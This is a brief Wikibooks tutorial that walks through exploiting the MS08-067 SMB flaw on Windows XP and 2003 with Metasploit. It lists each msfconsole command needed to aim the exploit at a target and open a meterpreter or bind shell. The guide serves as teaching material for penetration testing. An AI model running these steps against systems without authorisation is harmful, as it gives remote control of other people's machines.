Jump to content

Metasploit/Caseofstudy

From Wikibooks, open books for an open world

A simple manual exploitation using metasploit

[edit | edit source]

Assumptions:

  • you are using metasploit's latest version and exploits (svn / subversion)
  • The target machine is a windows box with windows XP (SP1,SP2,SP3) or Windows 2003 (SP0)
  • The target machine has port 445 open (check it via nmap -p 445 <target machine's ip>


Steps:

  • 1. load msfconsole of metasploit
  • 2. msf > info exploit/windows/smb/ms08_067_netapi
  • 3. msf> use exploit/windows/smb/ms08_067_netapi
  • 4. msf exploit(ms08_067_netapi) > show options
  • 5. msf exploit(ms08_067_netapi) > set RHOST <target ip>
  • 6. msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
  • !. You can also use generic/shell_bind_tcp as payload to get a command prompt.
  • 7. msf exploit(ms08_067_netapi) > set TARGET <choose the target with the corresponding id given via the 'show targets' command >.
  • 8. msf exploit(ms08_067_netapi) > exploit


If everything goes like this, you will get a meterpreter shell. From there onwards you can do post exploitation stuff ( explained in Post exploitation activities|http://en.wikibooks.org/wiki/Metasploit/post_exploitation)

Video Guide on using MS08_067_Netapi:
http://guides.intern0t.net/msf1.php